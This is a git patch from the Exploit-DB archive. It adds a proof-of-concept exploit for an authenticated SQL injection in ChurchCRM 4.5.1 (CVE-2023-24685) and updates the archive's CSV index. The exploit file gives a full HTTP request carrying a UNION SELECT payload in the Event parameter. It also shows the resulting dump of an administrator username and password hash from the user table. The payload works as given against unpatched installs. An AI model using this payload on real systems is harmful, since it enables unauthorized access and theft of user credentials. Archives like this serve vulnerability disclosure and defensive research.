From 1015b02d68d04f5f362b88946b930d584a8f9269 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Fri, 28 Apr 2023 00:16:25 +0000 Subject: [PATCH] DB: 2023-04-28 2 changes to exploits/shellcodes/ghdb Answerdev 1.0.3 - Account Takeover ChurchCRM v4.5.1 - Authenticated SQL Injection --- exploits/php/webapps/51397.txt | 30 ++++++++++++++++++++++++++++++ files_exploits.csv | 3 ++- 2 files changed, 32 insertions(+), 1 deletion(-) create mode 100644 exploits/php/webapps/51397.txt diff --git a/exploits/php/webapps/51397.txt b/exploits/php/webapps/51397.txt new file mode 100644 index 000000000..ece0809c1 --- /dev/null +++ b/exploits/php/webapps/51397.txt @@ -0,0 +1,30 @@ +# Exploit Title: ChurchCRM 4.5.1 - Authenticated SQL Injection +# Date: 27-04-2023 +# Exploit Author: Iyaad Luqman K +# Software Link: https://github.com/ChurchCRM/CRM/releases +# Vendor Homepage: http://churchcrm.io/ +# Version: 4.5.1 +# Tested on: Windows, Linux +# CVE: CVE-2023-24685 + + +ChurchCRM v4.5.3 and below was discovered to contain a SQL injection vulnerability via the Event parameter +under the Event Attendance reports module. + +- After Logging in, go to +``` +GET /EventAttendance.php?Action=List&Event=2+UNION+ALL+SELECT+1,NULL,CONCAT(%27Perseverance%27,usr_Username,%27:%27,usr_Password),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+from+user_usr--+-&Type=Sunday%20School HTTP/1.1 +Host: localhost +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: CRM-7bf048c51cd7d0923f0ab3e959c3d3f6=d99fjb19f2kp081ol95remfm6d +Connection: close + +``` +- The response will dump the `usr_Username` and `usr_Password` from the database. +``` +PerseveranceAdmin:261f4aef6877ce6c11a780ae6c13e4e2f27a8a55f69d6d6785fc787063272db4 +``` \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b69192352..cc34528f1 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -2898,7 +2898,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 44212,exploits/freebsd_x86-64/dos/44212.c,"FreeBSD Kernel (FreeBSD 10.2 x64) - 'sendmsg' Kernel Heap Overflow (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,,2018-02-28,2018-02-28,0,CVE-2016-1887,,,,,https://cturt.github.io/sendmsg.html 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,Local,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb -51257,exploits/go/webapps/51257.py,"Answerdev 1.0.3 - Account Takeover",2023-04-05,"Eduardo Pérez-Malumbres Cervera",webapps,go,,2023-04-05,2023-04-05,0,CVE-2023-0744,,,,, +51257,exploits/go/webapps/51257.py,"Answerdev 1.0.3 - Account Takeover",2023-04-05,"Eduardo Pérez-Malumbres Cervera",webapps,go,,2023-04-05,2023-04-27,1,CVE-2023-0744,,,,, 7060,exploits/hardware/dos/7060.txt,"2WIRE DSL Router - 'xslt' Denial of Service",2008-11-08,hkm,dos,hardware,,2008-11-07,,1,OSVDB-60243;CVE-2008-6605;OSVDB-49835,,,,, 2246,exploits/hardware/dos/2246.cpp,"2WIRE Modems/Routers - 'CRLF' Denial of Service",2006-08-22,preth00nker,dos,hardware,,2006-08-21,,1,OSVDB-28171;CVE-2009-3962;CVE-2006-4523,,,,, 10182,exploits/hardware/dos/10182.py,"2WIRE Router 5.29.52 - Remote Denial of Service",2009-10-29,hkm,dos,hardware,,2009-10-28,,1,,,,,,http://secunia.com/advisories/21583 @@ -15493,6 +15493,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50116,exploits/php/webapps/50116.py,"Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE",2021-07-09,"Eleonora Guardini",webapps,php,,2021-07-09,2021-07-09,0,,,,,, 50965,exploits/php/webapps/50965.txt,"ChurchCRM 4.4.5 - SQLi",2022-06-14,nu11secur1ty,webapps,php,,2022-06-14,2022-06-14,0,CVE-2022-31325,,,,, 51319,exploits/php/webapps/51319.py,"ChurchCRM 4.5.1 - Authenticated SQL Injection",2023-04-07,Arvandy,webapps,php,,2023-04-07,2023-04-07,0,CVE-2023-24787,,,,, +51397,exploits/php/webapps/51397.txt,"ChurchCRM v4.5.1 - Authenticated SQL Injection",2023-04-27,"Iyaad Luqman K",webapps,php,,2023-04-27,2023-04-27,1,CVE-2023-24685,,,,, 51296,exploits/php/webapps/51296.txt,"ChurchCRM v4.5.3-121fcc1 - SQL Injection",2023-04-06,nu11secur1ty,webapps,php,,2023-04-06,2023-04-06,0,,,,,, 15887,exploits/php/webapps/15887.txt,"ChurchInfo 1.2.12 - SQL Injection",2011-01-01,dun,webapps,php,,2011-01-01,2011-01-01,1,OSVDB-70253,,,,http://www.exploit-db.comchurchinfo-1.2.12.zip, 36874,exploits/php/webapps/36874.txt,"Chyrp 2.1.1 - 'ajax.php' HTML Injection",2012-02-22,"High-Tech Bridge SA",webapps,php,,2012-02-22,2015-05-01,1,CVE-2012-1001;OSVDB-79456,,,,,https://www.securityfocus.com/bid/52115/info